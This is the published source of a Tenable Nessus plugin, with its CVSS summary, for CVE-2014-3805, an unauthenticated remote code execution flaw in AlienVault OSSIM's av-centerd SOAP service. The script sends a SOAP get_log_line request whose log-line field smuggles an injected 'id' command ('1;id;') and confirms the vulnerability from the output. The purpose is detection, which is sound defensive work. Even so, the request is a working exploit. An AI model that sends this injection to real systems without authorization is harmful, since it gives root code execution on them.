CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS
Percentile
98.0%
The remote host is running a version of AlienVault Open Source Security Information Management (OSSIM) that is affected by a remote code execution vulnerability in the ‘av-centerd’ SOAP service due to a failure to sanitize user input to the ‘get_log_line’ method. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with root privileges.
Note that this version is reportedly also affected by other remote code execution vulnerabilities as well as a SQL injection issue.
However, Nessus did not test for these additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(76193);
script_version("1.12");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2014-3805");
script_bugtraq_id(67998);
script_name(english:"AlienVault OSSIM 'av-centerd' Remote Code Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote host is running a version of AlienVault Open Source
Security Information Management (OSSIM) that is affected by a remote
code execution vulnerability in the 'av-centerd' SOAP service due to a
failure to sanitize user input to the 'get_log_line' method. A remote,
unauthenticated attacker can exploit this vulnerability to execute
arbitrary code with root privileges.
Note that this version is reportedly also affected by other remote
code execution vulnerabilities as well as a SQL injection issue.
However, Nessus did not test for these additional issues.");
script_set_attribute(attribute:"see_also", value:"http://forums.alienvault.com/discussion/2690");
script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-14-199/");
script_set_attribute(attribute:"solution", value:
"Upgrade to 4.7.0 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2014/06/11");
script_set_attribute(attribute:"patch_publication_date", value:"2014/05/06");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/23");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:alienvault:open_source_security_information_management");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ossim_soap_detect.nbin");
script_require_ports("www/AlienVault OSSIM 'av-centerd' SOAP Service");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
function _soap_create_request(tag, header, body, schema_year)
{
local_var request;
if (isnull(body))
return NULL;
if (isnull(schema_year))
schema_year = "2001";
if (isnull(tag))
tag = "soapenv";
request =
'<?xml version="1.0" encoding="utf-8"?>
<' + tag + ':Envelope ' + tag + ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/' + schema_year + '/XMLSchema-instance"
xmlns:' + tag + '="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/' + schema_year + '/XMLSchema">';
if (!isnull(header))
request += '<' + tag + ':Header>' + header + '</' + tag + ':Header>';
request +=
'<' + tag + ':Body>' +
body +
'</' + tag + ':Body>
</' + tag + ':Envelope>';
return request;
}
function soap_send_request(soap_action, url, port, soap_tag, soap_header, request, headers, exit_on_fail)
{
local_var result;
if (isnull(soap_tag))
soap_tag = "soapenv";
if (isnull(headers))
{
headers = make_array(
"Content-type", "application/soap+xml",
"User-Agent", "Nessus SOAP v0.0.1 (Nessus.org)"
);
}
headers["SOAPAction"] = soap_action;
result = http_send_recv3(
method : "POST",
item : url,
port : port,
add_headers : headers,
data : _soap_create_request(tag:soap_tag, header:soap_header, body:request),
exit_on_fail : exit_on_fail
);
return result;
}
app_name = "AlienVault OSSIM 'av-centerd' SOAP Service";
port = get_kb_item_or_exit('www/' + app_name);
method = 'get_log_line';
method_namespace = 'AV/CC/Util';
soap_action = strcat(method_namespace, '#', method);
url = "/av-centerd";
# We append an 'id' command to the log line number, which prior to
# 4.7.0 is not sanitized via int() in the executing perl script.
request =
'<m:' + method + ' xmlns:m="' + method_namespace + '">
<string>All</string>
<string>423d7bea-cfbc-f7ea-fe52-272ff7ede3d2</string>
<string>' + unixtime() + '</string>
<string>' + SCRIPT_NAME + '</string>
<string>/var/log/auth.log</string>
<string>1;id;</string>
</m:' + method + '>';
soap_response =
soap_send_request(
soap_action:soap_action,
url:url,
port:port,
request:request,
exit_on_fail:TRUE);
# Verify that 'id' command executed.
pattern = ">\s*(uid=.*)\s*</item";
match = eregmatch(string:soap_response[2], pattern:pattern);
if (isnull(match)) audit(AUDIT_LISTEN_NOT_VULN, app_name, port);
if (report_verbosity > 0)
{
report =
'\n' + 'Nessus executed "id" by sending the following request :' +
'\n' +
'\n' + crap(data:'-', length:30) + " request " + crap(data:'-', length:30) +
'\n' + chomp(http_last_sent_request()) +
'\n' + crap(data:'-', length:30) + " request " + crap(data:'-', length:30) +
'\n' +
'\n' + 'Which resulted in the following command output :' +
'\n' +
'\n' + data_protection::sanitize_uid(output:match[1]);
security_hole(port:port, extra:report);
}
else security_hole(port);